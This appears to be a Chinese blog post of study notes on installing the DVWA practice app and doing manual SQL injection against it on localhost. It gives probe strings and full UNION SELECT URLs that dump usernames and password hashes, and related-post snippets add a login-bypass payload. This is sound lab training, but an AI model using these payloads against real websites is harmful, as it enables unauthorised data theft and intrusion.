DVWA安装使用

最新推荐文章于 2023-03-10 11:48:22 发布
最新推荐文章于 2023-03-10 11:48:22 发布
阅读量250 收藏
点赞数
分类专栏: Hacker Way 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45650712/article/details/107721461
版权

学习笔记—DVWA

一、安装dvwa
步骤:https://www.cnblogs.com/sevenbug/p/11417100.html
注:修改成自己数据库的密码。
在这里插入图片描述
账号:admin 密码:password
在这里插入图片描述
安装test靶机
在这里插入图片描述
直接访问:192.168.1.102
在这里插入图片描述
安装web练习1
密码:123456
在这里插入图片描述
在这里插入图片描述
用dvwa进行注入:
在这里插入图片描述
参考一次重测案例:https://mp.weixin.qq.com/s/PJMtil2tO79o4xHLXdUhuw
1
1‘
1‘ and 1=1
1’ and ‘1’=’1’
1’ and ‘1’=’2’
1’or ‘1’='1
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
二、在火狐中操作:
1.Dvwa 低sql手工
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1 or 1=1 order by 2 --+&Submit=Submit#
在这里插入图片描述
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1 or 1=1&Submit=Submit#
在这里插入图片描述
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+order+by+2+%23&Submit=Submit#
在这里插入图片描述
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27+or+1%3D1+order+by+3+%23&Submit=Submit#
在这里插入图片描述
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=1%27+union+select+user%2cpassword+from+dvwa.users+%23&Submit=Submit#
在这里插入图片描述
2.Dvwa 中sql手工
在这里插入图片描述
在这里插入图片描述
http://127.0.0.1/dvwa/vulnerabilities/sqli/?id%20=1%20union%20select%20group_concat(user),group_concat(password)from%20dvwa.users%20–%20&Submit=submit#
在这里插入图片描述
id=2 union select 1,COLUM_NAME from information_schema.COLUMNS where TABLE_SCHEMA=0x64767761 and TABLE_NAME=0x7573657273 & Submit=Submit
在这里插入图片描述
3.Dvwa 高sql手工
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
4.Sql injection(Blind)
在这里插入图片描述
了解更多请关注下列公众号:
在这里插入图片描述

永不垂头
关注
专栏目录
DVWA安装以及模块使用教程(一)
Estrus5的博客
04-30 1万+
一、DVWA介绍 DVWA(Damn Vulnerable Web Application)是randomstorm的一个开源项目。一个用来进行安全脆弱性鉴定的PHP/MySQL Web应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。 DVWA共有十个模块,分别是: 1.Brute Force(密码破解) 2.Command Injection(命令行注入) 3.CSRF(跨站请求伪造) 4.File Inclusion(文件包含) 5.F
DVWA安装过程
最新发布
2201_75331136的博客
03-10 618
DVWA安装
DVWA 初次尝试(下)
borrrrring的博客
02-07 288
SQL Injection (Blind)(SQL盲注) Low 查看源码,可以发现没有任何的过滤以及进行检查的语句,我们可以先进行测试 我们可以发现无论输入什么都只会出现这两个语句,即由此可以判断出这就是盲注。 当我们进行盲注时,不会进行报错,只会对我们输入的命令进行判断,判断是否正确。 一、以布尔盲注示例:(根据显示存在与否来进行判断) 判断是否存在注入,以及注入的是字符型还是数字型 输入 1 显示存在 输入1’ and 1=1# 显示存在 输入1’ and 1=2# 显示不存在 即是存在字符
DVWA-SQL回显注入模块 包括代码审计
weixin_45715461的博客
06-01 557
DVWA-SQL回显注入模块 包括代码审计
DVWA搭建遇见问题
xiao_he0123的博客
01-06 2165
DVWA第一次搭建遇到好多问题上网查也好多都零零星星或和自己的问题有差异 所以整理一篇常见问题 1.数据库无法连接 打开phpstudy 记住端口号 打开数据库记住数据库名和密码 打开phpstudy安装目录下的DVWA的config使用记事本打开config.inc.php 查看用户名,密码,端口号是否和phpstudy配置相同(要注意端口号,本人就没有注意以至于一直没有搭建完成) 之后重启mysql重新访问127.0.0.1/DVWA即可 2.红字问题 ...
DVWA安装实验练习
耿先生的博客
12-30 964
DVWA安装实验报告 实验环境Centos 7下Windows7+Windows sever 2008 实验步骤 一、从宿主机中将所需安装包复制到/windows sever 2008/计算机/D:/soft。将安装包解压到当前目录下 二、将解压出的文件夹剪切——粘贴到C:/xamppa/htdocs目录下 三、在Windows7下使用火狐访问192.168.22.162/dvwa 四、返回2008端,火狐访问127.0.0.1,选择中文版 五、进入主页面后,选择phpMyadmin 六、用户——
dvwa安装使用指南
weixin_33779515的博客
01-26 2772
---------------------------------------说明本手册作为教学的一部分供大家参考。具体的关于web漏洞的学习大家可以参考《web***测试-常见漏洞解析课程》http://edu.51cto.com/course/course_id-5281.html ---------------------------------------1....
kali2021.3安装dvwa靶场
02-24
标题中的“kali2021.3安装dvwa靶场”是指在Kali Linux 2021.3版本中安装DVWA(Damn Vulnerable Web Application)的过程,这是一个广泛用于Web安全学习和实践的模拟靶场。描述中提到,这个教程是为刚接触Kali的爱好...
DVWA安装及phpstudy安装
m0_75059136的博客
03-10 317
关于phpstudy、DVWA下载及安装
Burpsuite在Firefox中无法抓取DVWA本地数据包解决方案+导入证书
1stPeak's Blog
08-13 3846
前言: 这几天重装了系统,软件也大部分重新安装,在使用bp时,遇到了不能抓取dvwa数据包的情况。 解决方案: 猜想: 可能是浏览器自动将127.0.0.1与localhost默认选择不使用代理服务,无法修改(反正我没找到) 方案: 将url栏中的127.0.0.1或localhost修改为实际IP 如下图: 将 修改为 实际IP获取方法: win+r后输入cmd,再输入ipconfig(wi...
DVWA使用教程(Brute Force)(一)
热门推荐
ai_64的博客
06-09 2万+
DVWA使用教程(Brute Force)(一) DVWA是一个用来练习Web渗透的PHP应用。共有十个模块,分别是 1.Brute Force(爆破) 2.Command Injection(命令注入) 3.CSRF(跨站请求伪造) 4.File Inclusion(文件包含) 5.File Uplod(文件上传) 6.Insecure CAPTCHA(不安全的验证码) 7.SQL...
dvwa之sql injection之sqlmap工具注入(low版)
crowsec
04-27 1842
可能要用到的参数:-u             指定URL--cookie     带cookie注入爆库:--dbs     发现所有数据库 (参数前有空格)列出数据库:--tables     列出数据库表  (参数前有空格)-D            选择数据库首先一定先把难度调为low当写1-5的时候,都会有值出来直接上工具如下:Sqlmap -u "http://127.0.0.1/dv...
【## 解决如何安装DVWA以及安装过后数据库无法打开和DVWA无法连接数据库的问题】
weixin_54586360的博客
06-30 5349
DVWA安装及相关问题解决
为啥本地搭建了DVWA用burpsuite却抓不到包?
毒酒一瓢
02-09 1万+
用的是火狐浏览器,localhost和127.0.0.1换来换去没什么用,还是抓不到,结果最后发现火狐的代理里面有个localhost和127.0.0.1不适用代理的默认设置。。 把不使用代理中的内容给删除了就好了
FireFox下DVWA和ZAP环境下证书不安全
weixin_42652059的博客
06-16 502
问题如下: FireFox设置代理后提示连接不安全 解决办法 ZAP中生成证书导入FireFox 保存到本地后导入到FireFox 问题解决
DVWA-“错误”,出现“localhost拒绝了请求”-解决方法
HZM_5201314的博客
05-30 5315
这几天安装DVWA,然后学习,今儿打开电脑,按照往常一样打开phpStudy,然后在谷歌浏览器中输入“localhost/DVWA-master/login.php”之后,神奇的一幕发生了,localhost拒绝了请求,让检查代理和网络配置。一开始认为是昨天配的代理有问题了,把LAN前面的✅去掉了,但是还是老样子,问了问度娘还是一无所获,经过几次试探,各方面的检查,发现,是端口被占用了“3306”...
dvwa靶场
charon145的博客
02-04 366
一.暴力破解 low: 分析源码 判断这两个值是否都不为空 先输一个错误的密码 ​ 构造admin' or '1'= '1 变成$ query = "SELECT * FROM ’users‘ WHERE user = ’admin' or '1'= '1’AND password = ' ';" 用or把语句截断为两部分,查询到账号即有效,语句判断为真,登陆成功 2.medium mysqli_real_escape_string: 不能使用单引号,low的绕过..
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值